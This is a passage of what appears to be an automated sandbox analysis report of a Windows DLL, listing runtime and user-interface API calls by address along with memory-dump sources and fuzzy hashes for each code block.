                                            • Part of subcall function 6C52A27F: __getptd_noexit.LIBCMT ref: 6C52A282
                                            • Part of subcall function 6C52A27F: __amsg_exit.LIBCMT ref: 6C52A28F
                                          • __getptd.LIBCMT ref: 6C52C190
                                          • __getptd.LIBCMT ref: 6C52C19E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: MOC$csm
                                          • API String ID: 803148776-1389381023
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?,?,6C5149D6,?,00000003), ref: 6C515685
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6C5156B4
                                          • GetLastError.KERNEL32 ref: 6C5156C5
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6C5156E5
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6C515709
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                          • String ID:
                                          • API String ID: 3322701435-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ParentWindow$ActiveEnableEnabledLastPopup
                                          • String ID:
                                          • API String ID: 2630416829-0
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?), ref: 6C51DA3D
                                          • _memset.LIBCMT ref: 6C51DA5B
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 6C51DA75
                                          • lstrcmpW.KERNEL32(?,?,?,?), ref: 6C51DA87
                                          • SetWindowTextW.USER32(00000000,?), ref: 6C51DA93
                                            • Part of subcall function 6C516DC1: __CxxThrowException@8.LIBCMT ref: 6C516DD7
                                            • Part of subcall function 6C516DC1: __EH_prolog3.LIBCMT ref: 6C516DE4
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                          • String ID:
                                          • API String ID: 4273134663-0
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 6C51DB6D
                                          • GetDlgCtrlID.USER32(00000000), ref: 6C51DB81
                                          • GetWindowRect.USER32(00000000,?), ref: 6C51DBA3
                                          • PtInRect.USER32(?,?,?), ref: 6C51DBB3
                                          • GetWindow.USER32(?,00000005), ref: 6C51DBC0
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: RectWindow$ClientCtrlScreen
                                          • String ID:
                                          • API String ID: 4072766398-0
                                          APIs
                                          • __lock.LIBCMT ref: 6C524636
                                            • Part of subcall function 6C52A914: __mtinitlocknum.LIBCMT ref: 6C52A92A
                                            • Part of subcall function 6C52A914: __amsg_exit.LIBCMT ref: 6C52A936
                                            • Part of subcall function 6C52A914: RtlEnterCriticalSection.NTDLL(00000000), ref: 6C52A93E
                                          • ___sbh_find_block.LIBCMT ref: 6C524641
                                          • ___sbh_free_block.LIBCMT ref: 6C524650
                                          • HeapFree.KERNEL32(00000000,00000000,6C53E828,0000000C,6C52A270,00000000,?,6C52A5D4,00000000,00000001,00000000,?,6C52A89E,00000018,6C53E978,0000000C), ref: 6C524680
                                          • GetLastError.KERNEL32(?,6C52A5D4,00000000,00000001,00000000,?,6C52A89E,00000018,6C53E978,0000000C,6C52A92F,00000000,00000000,?,6C52A32A,0000000D), ref: 6C524691
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                          • String ID:
                                          • API String ID: 2714421763-0
                                          APIs
                                          • TlsFree.KERNEL32(?,?,?,6C51C179), ref: 6C51C13B
                                          • GlobalHandle.KERNEL32(?), ref: 6C51C149
                                          • GlobalUnlock.KERNEL32(00000000), ref: 6C51C152
                                          • GlobalFree.KERNEL32(00000000), ref: 6C51C159
                                          • RtlDeleteCriticalSection.NTDLL ref: 6C51C163
                                            • Part of subcall function 6C51BF5D: RtlEnterCriticalSection.NTDLL(?), ref: 6C51BFBC
                                            • Part of subcall function 6C51BF5D: RtlLeaveCriticalSection.NTDLL(?), ref: 6C51BFCC
                                            • Part of subcall function 6C51BF5D: LocalFree.KERNEL32(?), ref: 6C51BFD5
                                            • Part of subcall function 6C51BF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6C51BFE7
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                          • String ID:
                                          • API String ID: 1549993015-0
                                          APIs
                                          • GetMenuCheckMarkDimensions.USER32 ref: 6C5196F2
                                          • _memset.LIBCMT ref: 6C51976A
                                          • LoadBitmapW.USER32(00000000,00007FE3), ref: 6C5197E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: BitmapCheckDimensionsLoadMarkMenu_memset
                                          • String ID:
                                          • API String ID: 3130454499-3916222277
                                          • Opcode ID: 934f8aff59d2b41587f9ac8e2e8b99f644d21d9aed3fd0f7513f52c3f0e84615
                                          • Instruction ID: f28ae02be5c98c1e2c21d639ba0c6e1cdc82510b0bbaffdfa16eafe683ac60dd
                                          • Opcode Fuzzy Hash: 934f8aff59d2b41587f9ac8e2e8b99f644d21d9aed3fd0f7513f52c3f0e84615
                                          • Instruction Fuzzy Hash: 32313871B002159BEF208F289CC8BA97BB4FF45308F4580A6E549D7681DB349D498F50
                                          APIs
                                          • GetModuleHandleA.KERNEL32(KERNEL32,6C5277D7), ref: 6C52ED7C
                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6C52ED8C
                                          Strings
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                          • API String ID: 1646373207-3105848591
                                          • Opcode ID: c4f8433d77dd9f09abc79a9d0a71e4188c8f8dca7549aed07959aae9b09cfe77
                                          • Instruction ID: 49b18a3558df42c55fbcfd7da1208ecf0fe833ddf644e063761108b7ce248c61
                                          • Opcode Fuzzy Hash: c4f8433d77dd9f09abc79a9d0a71e4188c8f8dca7549aed07959aae9b09cfe77
                                          • Instruction Fuzzy Hash: 7AF03630600909D2DF105FF1AD2D65F7BB9BB81746F420994D19AE05C4EF7480749299
                                          APIs
                                          • ___addlocaleref.LIBCMT ref: 6C53054E
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(00000000), ref: 6C530426
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(?), ref: 6C530433
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(?), ref: 6C530440
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(?), ref: 6C53044D
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(?), ref: 6C53045A
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(?), ref: 6C530476
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(?), ref: 6C530486
                                            • Part of subcall function 6C530414: InterlockedIncrement.KERNEL32(?), ref: 6C53049C
                                          • ___removelocaleref.LIBCMT ref: 6C530559
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(00000000), ref: 6C5304BD
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(?), ref: 6C5304CA
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(?), ref: 6C5304D7
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(?), ref: 6C5304E4
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(?), ref: 6C5304F1
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(?), ref: 6C53050D
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(?), ref: 6C53051D
                                            • Part of subcall function 6C5304A3: InterlockedDecrement.KERNEL32(?), ref: 6C530533
                                          • ___freetlocinfo.LIBCMT ref: 6C53056D
                                            • Part of subcall function 6C5302CB: ___free_lconv_mon.LIBCMT ref: 6C530311
                                            • Part of subcall function 6C5302CB: ___free_lconv_num.LIBCMT ref: 6C530332
                                            • Part of subcall function 6C5302CB: ___free_lc_time.LIBCMT ref: 6C5303B7
                                          Strings
                                          Similarity
                                          • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                          • String ID: P)Tl
                                          • API String ID: 467427115-1191581938
                                          • Opcode ID: 6027c97ef8c6db992a89b2e299bd646ed207aaa6e97d07d0150d1d15c782a183
                                          • Instruction ID: 1cbfc99095c2165bc9892a78241263622021115416c0ac59dfdd2e5c850db9b3
                                          • Opcode Fuzzy Hash: 6027c97ef8c6db992a89b2e299bd646ed207aaa6e97d07d0150d1d15c782a183
                                          • Instruction Fuzzy Hash: C2E04832903BB1958B111928BC902BA57944FD1E39B352157F86CE7D45FB248E8161BD
                                          APIs
                                          Similarity
                                          • API ID: File$SizeTime_memset
                                          • String ID:
                                          • API String ID: 151880914-0
                                          • Opcode ID: d384324cc10411b2fefed7f163dc6f43bfa7298fb5627e4af6a74e7cdbebf057
                                          • Instruction ID: 10985767d064466c3af0d996d3f4d42f952bab36205c2bf547e380e9a3742a14
                                          • Opcode Fuzzy Hash: d384324cc10411b2fefed7f163dc6f43bfa7298fb5627e4af6a74e7cdbebf057
                                          • Instruction Fuzzy Hash: 34510B71508605DFEB24CF68CC44D9AB7F8FB49364F104A1EE4A6D3A90E730E944CB64
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6C53084F
                                          • __isleadbyte_l.LIBCMT ref: 6C530883
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6C5240D8,6C53BF84,00000000,00000000,?,?,?,?,6C5240D8,00000000,?), ref: 6C5308B4
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6C5240D8,00000001,00000000,00000000,?,?,?,?,6C5240D8,00000000,?), ref: 6C530922
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 41922396f395d1f077da56048838dbab05187af35f9c6f69ca9759fa4c9ff152
                                          • Instruction ID: 88ab44a36db794e5d88601c640e0e520492aa1e66cd50c89b6f2a3141b7fb1c1
                                          • Opcode Fuzzy Hash: 41922396f395d1f077da56048838dbab05187af35f9c6f69ca9759fa4c9ff152
                                          • Instruction Fuzzy Hash: EF31E231A013E9EFDB00CF64CC80AAEBBB5BF81314F15456AE8689B591FB30D951DB90
                                          APIs
                                          Similarity
                                          • API ID: __msize_malloc
                                          • String ID:
                                          • API String ID: 1288803200-0
                                          • Opcode ID: 076c8ffbf8a57e90cb8397fe052492af68da67bccd0553d9386619fd7180d7d9
                                          • Instruction ID: 7f5af46c77db2f268b8a74048099ab611bf9a45fe60ecd27408bb571c243a8d3
                                          • Opcode Fuzzy Hash: 076c8ffbf8a57e90cb8397fe052492af68da67bccd0553d9386619fd7180d7d9
                                          • Instruction Fuzzy Hash: 0121D671109610DFEB15AF34DCC8A9A3FE5AF41758B21853AD8288BE92DB35FC44CA81
                                          APIs
                                          • GlobalLock.KERNEL32(?), ref: 6C5188E7
                                          • lstrcmpW.KERNEL32(00000000,?), ref: 6C5188F4
                                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6C51892E
                                          • GlobalLock.KERNEL32(00000000), ref: 6C518938
                                            • Part of subcall function 6C51DAD1: GlobalFlags.KERNEL32(?), ref: 6C51DAE0
                                            • Part of subcall function 6C51DAD1: GlobalUnlock.KERNEL32(?), ref: 6C51DAF2
                                            • Part of subcall function 6C51DAD1: GlobalFree.KERNEL32(?), ref: 6C51DAFD
                                          Similarity
                                          • API ID: Global$Lock$AllocFlagsFreeUnlocklstrcmp
                                          • String ID:
                                          • API String ID: 2391069079-0
                                          • Opcode ID: 5e63e9cf1cc468ab997524d51e74058fe0e90661c487a8a5f9b39c9b64cc5d80
                                          • Instruction ID: f5e2ff2646a87693896ce76123a4f9dd28d4a507c2d5f09a46716d0e1cbe75b9
                                          • Opcode Fuzzy Hash: 5e63e9cf1cc468ab997524d51e74058fe0e90661c487a8a5f9b39c9b64cc5d80
                                          • Instruction Fuzzy Hash: BC116D71508A04FADB229BA5CC48DAF7BBDFBC5B04B51045AFA05D2A20E731D904E721
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 6C51BFBC
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6C51BFCC
                                          • LocalFree.KERNEL32(?), ref: 6C51BFD5
                                          • TlsSetValue.KERNEL32(?,00000000), ref: 6C51BFE7
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                          • String ID:
                                          • API String ID: 2949335588-0
                                          • Opcode ID: 92835782e020ee5c8e2544e227cb226298cd0cc9add385450f63ea4d6c4cbcae
                                          • Instruction ID: 11274082934b6b805a4b10c552f4def9ba5efb7a47cd955a69a1baf6d81f0260
                                          • Opcode Fuzzy Hash: 92835782e020ee5c8e2544e227cb226298cd0cc9add385450f63ea4d6c4cbcae
                                          • Instruction Fuzzy Hash: AE1167B1601604EFE714EF64CC88F5AB7B4FF46319F20842AF1668BAA1CB71A950CF50
                                          APIs
                                          • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6C51D194
                                          • RegCloseKey.ADVAPI32(00000000), ref: 6C51D19D
                                          • swprintf.LIBCMT ref: 6C51D1BA
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6C51D1CB
                                          Similarity
                                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                                          • String ID:
                                          • API String ID: 22681860-0
                                          • Opcode ID: 38ad119740e154cbe4bbe1ff99bc9885b7fe8e59500354773938560f8c5472e4
                                          • Instruction ID: c10aab0fad8f2baecc7fabd49d144ddc6119813501d14702a2e5305dfa230dbb
                                          • Opcode Fuzzy Hash: 38ad119740e154cbe4bbe1ff99bc9885b7fe8e59500354773938560f8c5472e4
                                          • Instruction Fuzzy Hash: CB01A172640308ABDB119A648C49FAB77BCAF49718F11041AF900E7680EB74ED0487A4
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6C516A8A
                                            • Part of subcall function 6C5168E2: _malloc.LIBCMT ref: 6C516900
                                          • __CxxThrowException@8.LIBCMT ref: 6C516AC0
                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,6C5116A6,00000000,00000000,?,?,6C53D898,00000004,6C5116A6,00000000,6C5169F9,00000000), ref: 6C516AEA
                                          • LocalFree.KERNEL32(6C5116A6,6C5116A6,00000000,6C5169F9,00000000), ref: 6C516B12
                                          Similarity
                                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                                          • String ID:
                                          • API String ID: 1776251131-0
                                          • Opcode ID: 85081af4a9c2c80ed402afed32d6b9a348ad58bf04f25ba4c6c4b0849e24232d
                                          • Instruction ID: c1cb77fff512661de20d0214510334ef0e28e67f824779f09d583964a55fe9e7
                                          • Opcode Fuzzy Hash: 85081af4a9c2c80ed402afed32d6b9a348ad58bf04f25ba4c6c4b0849e24232d
                                          • Instruction Fuzzy Hash: 5E114C71644309EFEF04DF68CC44AA93BF5EF88314F20C929B929CAA90EB3199508B54
                                          APIs
                                            • Part of subcall function 6C5168E2: _malloc.LIBCMT ref: 6C516900
                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6C5172BB
                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 6C5172C1
                                          • DuplicateHandle.KERNEL32(00000000), ref: 6C5172C4
                                          • GetLastError.KERNEL32(?), ref: 6C5172DF
                                          Similarity
                                          • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                          • String ID:
                                          • API String ID: 3704204646-0
                                          • Opcode ID: 5a4b466ef411bdf5a1b0bc46fdf79f9a650308d6acbb7bf2e6724c92fcc7df78
                                          • Instruction ID: c7ca9fbda9e01052756d10cc78d2e7f9724d8e07eec66fdaa8844605f575d106
                                          • Opcode Fuzzy Hash: 5a4b466ef411bdf5a1b0bc46fdf79f9a650308d6acbb7bf2e6724c92fcc7df78
                                          • Instruction Fuzzy Hash: 6701B131704601ABEB108BAACC8CF5A7BA9EFC4394F244412F918CBA41EF70DD018764
                                          APIs
                                          • GetTopWindow.USER32(?), ref: 6C520F9D
                                          • GetTopWindow.USER32(00000000), ref: 6C520FDC
                                          • GetWindow.USER32(00000000,00000002), ref: 6C520FFA
                                          Similarity
                                          • API ID: Window
                                          • String ID:
                                          • API String ID: 2353593579-0
                                          • Opcode ID: e923418ae03a4a2812159a5a840d723a231f459abe0313cfafd78c21ae28b017
                                          • Instruction ID: c4536b0554bfa0ef42e5b53ade75fe2230eb35f08853f0dae2867a5a8a9b107e
                                          • Opcode Fuzzy Hash: e923418ae03a4a2812159a5a840d723a231f459abe0313cfafd78c21ae28b017
                                          • Instruction Fuzzy Hash: 8B01803204619AFBCF225F918D08EDF3FA6EF89354F014012FA14555A0D73AC572EBA5
                                          APIs
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                          • Instruction ID: 9a439e8331d03eae6a57c5c27709a8818d700adf40923bef04b5ca3b79a2770e
                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                          • Instruction Fuzzy Hash: 7811727244014ABBCF125F94CC41CDD3FA2BB59359B188414FA28655B0C77ACAB1AB81
                                          APIs
                                          • GetDlgItem.USER32(?,?), ref: 6C5203DC
                                          • GetTopWindow.USER32(00000000), ref: 6C5203EF
                                            • Part of subcall function 6C5203CF: GetWindow.USER32(00000000,00000002), ref: 6C520436
                                          • GetTopWindow.USER32(?), ref: 6C52041F
                                          Similarity
                                          • API ID: Window$Item
                                          • String ID:
                                          • API String ID: 369458955-0
                                          • Opcode ID: 1f85970a4372202f2338c8bfd21d10346ddd177771694b9f79468f3187b8f529
                                          • Instruction ID: babbb9de96754592bfe59e9499236fc98952dd5c0bae063c215cd0ec71eb3be6
                                          • Opcode Fuzzy Hash: 1f85970a4372202f2338c8bfd21d10346ddd177771694b9f79468f3187b8f529
                                          • Instruction Fuzzy Hash: 4B01D832103595A7DF221E518C24ECF3AE5AFC13A8B45C123FD1891681E738C91186D5
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(6C5434A8), ref: 6C51C25A
                                          • RtlInitializeCriticalSection.NTDLL(?), ref: 6C51C26C
                                          • RtlLeaveCriticalSection.NTDLL(6C5434A8), ref: 6C51C279
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 6C51C289
                                            • Part of subcall function 6C516DC1: __CxxThrowException@8.LIBCMT ref: 6C516DD7
                                            • Part of subcall function 6C516DC1: __EH_prolog3.LIBCMT ref: 6C516DE4
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                          • String ID:
                                          • API String ID: 2895727460-0
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(6C5432EC), ref: 6C51BA69
                                          • TlsGetValue.KERNEL32(6C5432D0,?,?,?,?,6C51C0B7,?,00000004,6C51AF00,6C516DDD,6C5168AD,?,6C524902,?), ref: 6C51BA7D
                                          • RtlLeaveCriticalSection.NTDLL(6C5432EC), ref: 6C51BA93
                                          • RtlLeaveCriticalSection.NTDLL(6C5432EC), ref: 6C51BA9E
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Leave$EnterValue
                                          • String ID:
                                          • API String ID: 3969253408-0
                                          APIs
                                          • __getptd.LIBCMT ref: 6C530586
                                            • Part of subcall function 6C52A27F: __getptd_noexit.LIBCMT ref: 6C52A282
                                            • Part of subcall function 6C52A27F: __amsg_exit.LIBCMT ref: 6C52A28F
                                          • __getptd.LIBCMT ref: 6C53059D
                                          • __amsg_exit.LIBCMT ref: 6C5305AB
                                          • __lock.LIBCMT ref: 6C5305BB
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                          • String ID:
                                          • API String ID: 3521780317-0
                                          APIs
                                          • _memset.LIBCMT ref: 6C52029B
                                          • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6C5202C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: MessageSend_memset
                                          • String ID: ,
                                          • API String ID: 1827994538-3772416878
                                          APIs
                                            • Part of subcall function 6C51A59C: GetModuleHandleW.KERNEL32(KERNEL32,6C51A6B6), ref: 6C51A5AA
                                            • Part of subcall function 6C51A59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C51A5CB
                                            • Part of subcall function 6C51A59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6C51A5DD
                                            • Part of subcall function 6C51A59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6C51A5EF
                                            • Part of subcall function 6C51A59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6C51A601
                                          • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C51A6D0
                                          • SetLastError.KERNEL32(0000006F), ref: 6C51A6E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
